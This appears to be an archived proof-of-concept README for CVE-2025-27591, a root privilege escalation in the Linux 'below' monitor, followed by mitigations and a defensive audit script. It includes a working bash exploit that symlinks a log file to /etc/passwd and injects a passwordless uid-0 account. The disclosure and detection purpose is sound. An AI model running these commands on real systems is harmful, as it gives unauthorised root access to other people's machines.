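Related vulnerability
Title: below security vulnerability (CVE-2025-27591)
Description: below is a resource monitor for modern Linux systems, open-sourced by Meta Incubator. Versions of below prior to v0.9.0 contain a security vulnerability that stems from the creation of a world-writable directory, which may allow escalation to root privileges via a symlink attack.
Description
CVE-2025-27591
Introduction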
### CVE-2025-27591 - Privilege Escalation via Insecure Log Handling
#### Overview
CVE-2025-27591 is a **local privilege escalation vulnerability** in the `below` utility (versions prior to the patched release) caused by **insecure symbolic link handling** within its logging mechanism. Attackers with local access can exploit this flaw to overwrite arbitrary files as the root user, leading to full privilege escalation.
#### Vulnerability Details
The `below` tool writes logs to `/var/log/below/` without properly validating symbolic links. By pre-creating a symlink pointing to a sensitive file (e.g., `/etc/passwd`), an attacker can inject arbitrary content with elevated privileges when the vulnerable process runs under `sudo`.
#### Exploit Demonstration
```bash
# Check if log directory exists
test -d /var/log/below && ls -ld /var/log/below
# Remove existing log file and create a malicious symlink
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepare malicious passwd entry
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Trigger vulnerable behavior using sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Switch to the newly created root-privileged user
su attacker
```
#### Impact
Successful exploitation grants **root privileges** to a local, unprivileged attacker, enabling full system compromise.
#### Mitigation
- Apply the vendor patch immediately once available.
- Restrict access to the `/var/log/below/` directory.
- Validate log file paths before writing to avoid following symbolic links.
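
A defender-side check for the two conditions described above, a world-writable log directory and a symlink standing in for a log file. This is an added example, not code from the original README or from the `below` project; `audit_log_dir` is a hypothetical helper name and the script assumes GNU `stat` on Linux.

```bash
# Added example: audit a log directory for the two conditions this CVE needs,
# a world-writable directory and a symlink standing in for a log file.
# audit_log_dir is a hypothetical helper; assumes GNU stat (Linux).
audit_log_dir() {
    dir="${1:-/var/log/below}"
    findings=0

    if [ ! -d "$dir" ]; then
        echo "SKIP: $dir is not a directory"
        return 0
    fi

    # The directory path itself must not be a symlink either.
    if [ -L "$dir" ]; then
        echo "FINDING: $dir is a symlink to $(readlink -- "$dir")"
        findings=$((findings + 1))
    fi

    # %a prints the octal mode; bit 0002 is write permission for "other".
    mode=$(stat -L -c '%a' -- "$dir")
    if [ $(( 0$mode & 0002 )) -ne 0 ]; then
        echo "FINDING: $dir is world-writable (mode $mode)"
        findings=$((findings + 1))
    fi

    # Any symlink directly inside the directory would be followed by a
    # writer that opens log files without a no-follow check.
    for entry in "$dir"/* "$dir"/.[!.]*; do
        [ -L "$entry" ] || continue
        echo "FINDING: $entry is a symlink to $(readlink -- "$entry")"
        findings=$((findings + 1))
    done

    if [ "$findings" -eq 0 ]; then
        echo "OK: $dir (mode $mode) has no findings"
        return 0
    fi
    return 1
}
```

Calling `audit_log_dir` with no argument checks `/var/log/below`; a non-zero exit status means at least one finding was printed.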
File snapshot
[4.0K] /data/pocs/07a7f0dbd454caf184ef8767438619e151ecd063
└── [1.6K] README.md
0 directories, 1 file